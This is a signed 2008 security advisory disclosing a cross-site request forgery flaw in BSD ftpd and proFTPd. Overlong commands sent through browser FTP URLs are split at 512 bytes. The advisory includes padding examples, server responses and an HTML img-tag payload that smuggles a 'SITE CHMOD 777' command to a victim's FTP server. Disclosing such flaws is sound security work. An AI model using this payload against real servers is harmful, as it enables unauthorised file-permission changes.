-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ multiple vendor ftpd - Cross-site request forgery ]
Author: Maksymilian Arciemowicz
securityreason.com
Date:
SecurityReason Research
SecurityAlert Id: 56
CVE: not assigned
SecurityRisk: Low
Affected Software:
This problem has been discovered on OpenBSD 4.3 .
Advisory URL:
http://securityreason.com/achievement_securityalert/56
The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP
protocol and listens at the port specified with the -P option or in the ``ftp'' service specification;
see services(5).
Cross-site request forgery, also known as one click attack, sidejacking or session riding and
abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby
unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting
(XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits
the trust that a site has for a particular user.
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
will be split for
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA':
command not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split.
return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506
return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609
The situation, can be dangerous, when this bug will be exploited like any CSRF attack. We can use
SITE CHMOD command to change file permission or other combinations with ftp commands. Only we need
some exploit and luck, that admin will executed exploited url.
How to exploit it?
Creating some html file with <img> tags
<img src="ftp://…////SITE%20CHMOD%20777%20FILENAME">
…
Give preparing URL for user.
will change permision to EXAMPLEFILE when the owner will use this URL.
I think, it should be some byte, what inform about overflowing (empty command should nulling this
byte). We have diagnosed this issue on BSD systems. Unfortunately, we do not know exactly how many
machines can be affected.
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y
Thanks for OpenBSD Team.
NetBSD:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c
proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115
SecurityReason has informed only BSD developers and proFTPd Team.
— 3. Greets —
sp3x infospec p_e_a pi3 schain
— 4. Contact —
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (OpenBSD)
iEYEARECAAYFAkjdBroACgkQpiCeOKaYa9aiFgCfSMm4Pb+2ELGr6WVNWcJHWz+8
3NgAoN6Owug0ezaLFqJ65xyrrDImtX3J
=8Rij
-----END PGP SIGNATURE-----